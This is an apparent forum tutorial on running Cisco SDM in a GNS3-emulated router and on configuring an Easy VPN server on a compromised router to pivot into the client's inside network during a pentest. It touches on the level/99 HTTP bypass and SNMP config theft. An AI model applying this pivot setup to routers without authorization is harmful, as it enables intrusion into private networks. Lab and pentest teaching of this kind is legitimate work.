
This HowTo will detail installing Cisco SDM into an emulated router in BT4. SDM is a slick GUI that can simplify some configuration tasks, and can be cool to mess around with. Some features may or may not work depending on what IOS version and feature set it is coupled with. I apologize for any redundancy with previous posts, but I like my HowTos to be as complete as possible, despite this being somewhat of a GNS3 series.

Later on in the post I'll add a simple VPN setup and demonstrate pivoting with it. I'd like to address command-line setup of IPS if I can. I've begun some of the stages, so I'll keep you posted. It was initially intended to tie in with SDM, but I have as yet been unable to get SDM to recognise that my emulated IOS does indeed have IPS included in the feature set.

The primary file needed in this case is

Code:

CisSdM.rar

You'll need to extract it. I like to keep things clean in a working directory.

Now add your IOS image into GNS3. Start your router and console in. Wait until it has finished booting and is idle. Right click and calculate an Idle-PC value, otherwise your CPU will be loaded hard. Choose a value with a * next to it. Configure your router for SSH and some other basics (SDM is reached over HTTPS, so the router's secure HTTP server must be on). Use 1024 bits for the SSH key when prompted. SDM also requires the user to have privilege level 15.

And now just browse to the router's IP in your browser. Make sure you have Java installed. Different Java versions allow different SDM features to work properly; I'm not sure which, however. Also turn off your pop-up blocker. I am using a Windows VM just to simplify the process, as everything was already set up.

Code:

https://192.168.25.105/
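The router-side configuration for the steps above, written out as an added example (this is not the original post's config). The hostname, domain name, interface address and credentials are assumptions for the lab; the 1024-bit key follows the post, and the comment says where that is a weakness.

```ios
! Added example, not from the original post: the minimum IOS configuration that
! satisfies the SDM prerequisites described above (SSH, HTTPS server, a local user
! at privilege 15). Hostname, domain, address and credentials are lab assumptions.
hostname R1
ip domain-name lab.local
!
! SDM refuses anything below privilege 15. Use 'secret' (hashed), never 'password'.
username admin privilege 15 secret s3cret-lab-passw0rd
!
! RSA key pair for SSH. Typed in config mode after hostname/domain are set; it is
! not stored as a line in the running-config. 1024 bits matches the post (older
! images cap the modulus); anywhere outside a throwaway lab use 2048 or more.
crypto key generate rsa modulus 1024
ip ssh version 2
!
! HTTPS for SDM, authenticating against the local user database. Keep the
! plaintext HTTP server off: the level/99 HTTP authorization bypass mentioned
! later in this post lived in the plaintext server of old images.
no ip http server
ip http secure-server
ip http authentication local
!
interface FastEthernet0/0
 ip address 192.168.25.105 255.255.255.0
 no shutdown
!
line vty 0 4
 login local
 transport input ssh
```

After this, `ssh -l admin 192.168.25.105` and `https://192.168.25.105/` both authenticate as the privilege-15 user, which is the state SDM expects when it loads.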

Have fun with SDM!

......

And now on to the simple VPN server config. It could be handy for messing around with VPN discovery or bruteforcing tools. I haven't had the time to try some of my ideas as of yet, or other VPN configurations for that matter. The original idea for this came as a nice way to pivot inside. Suppose you've already compromised your client's Cisco router. Maybe it hasn't seen care lately and has an old IOS version with the level/99 HTTP vulnerability. Well, now you've got level 15 access. Now what? OK, well maybe show arp, and hey, how many records is that in the table? Around 34 entries. Let's ping the IPs! Well, some are alive, but if only I could nmap them somehow or use Metasploit.......

The router's IP in this scenario is 192.168.25.105, which sort of represents the public or outside side in the config below.

The 192.168.10.0 network is the inside network we are wanting to pivot to in order to attack in this given scenario.
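One way to build the "simple VPN server" for this pivot, as an added example that is not the post's own configuration: an IOS Easy VPN (IPsec remote-access, PSK plus XAUTH) server on the compromised router. An attacker box running a compatible client connects from the 192.168.25.0/24 side, receives an address from a pool and is handed a split-tunnel route to 192.168.10.0/24, so nmap and Metasploit on the attacker box reach the inside hosts. The group name, pre-shared key, user credentials, the 192.168.99.0/24 client pool and the inside interface address are assumptions; the outside address and inside network follow the scenario above.

```ios
! Added example, not from the original post: an Easy VPN server on the compromised
! router used purely as a pivot. Group name, PSK, user, pool and fa0/1 address are
! assumptions; 192.168.25.105 / 192.168.10.0/24 come from the scenario above.
aaa new-model
! Keep console/vty logins working after enabling AAA, or you lock yourself out.
aaa authentication login default local
aaa authentication login VPN-XAUTH local
aaa authorization network VPN-GROUP local
username vpnuser secret vpn-user-passw0rd
!
! Phase 1: aggressive-mode PSK + XAUTH. This is exactly the pattern VPN discovery
! and PSK-cracking tools look for, which is why it is a convenient lab target.
crypto isakmp policy 10
 encryption aes 256
 hash sha
 authentication pre-share
 group 2
!
! Group policy pushed to the client: group key, address pool, split-tunnel ACL.
crypto isakmp client configuration group PIVOT
 key pivot-group-key
 pool VPN-POOL
 acl 110
!
crypto ipsec transform-set TS esp-aes 256 esp-sha-hmac
!
crypto dynamic-map DYN 10
 set transform-set TS
 reverse-route
!
crypto map CM client authentication list VPN-XAUTH
crypto map CM isakmp authorization list VPN-GROUP
crypto map CM client configuration address respond
crypto map CM 10 ipsec-isakmp dynamic DYN
!
! Pool is its own subnet so there is no ARP/proxy-ARP confusion on the inside LAN.
! Inside hosts reply to 192.168.99.x through the router, so the router must be
! their default gateway (or they need a route to the pool via it).
ip local pool VPN-POOL 192.168.99.10 192.168.99.20
! Split tunnel: only traffic for the inside network is sent into the tunnel.
access-list 110 permit ip 192.168.10.0 0.0.0.255 any
!
interface FastEthernet0/0
 ip address 192.168.25.105 255.255.255.0
 crypto map CM
!
interface FastEthernet0/1
 ip address 192.168.10.1 255.255.255.0
```

Once a client is connected, `show crypto isakmp sa` and `show crypto ipsec sa` on the router confirm the tunnel, and the attacker box should be able to scan 192.168.10.0/24 directly. Because `reverse-route` injects a host route for each connected client, the inside hosts' return traffic finds its way back even if the router is not their gateway, as long as they can reach the router.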

Let me know if this is useful or interesting for any of you. I'm still working on the SIP/VoIP tools for my previous write-up and working on this HowTo as well. IPS stuff will be coming, but I'd like to get some videos of the previous processes up first to help illustrate that, then comes IPS. Stay tuned....

I have now made a short video of a scenario using some of the above configurations.

You've been contracted to perform a pentest, and been provided the public IP of the company (per the scope of this particular test). Social engineering attacks are not authorized by the client, and the goal is to penetrate from outside to the inside and be able to attack inside machines.

The public network in this is represented by my laboratory LAN network 192.168.25.0/24, which is bridged to tap0 and connected to the outside interface of the client's router (fa0/0).
The private network is on router interface fa0/1 and is bridged to tap1. I also have a Damn Small Linux virtual machine bridged to tap1 so we have a small target. The client's inside LAN is discovered to be 10.0.0.0/24. The video demonstrates nmap to discover services, SNMP to steal the config, and VPN to pivot to the inside network for scanning and attacks.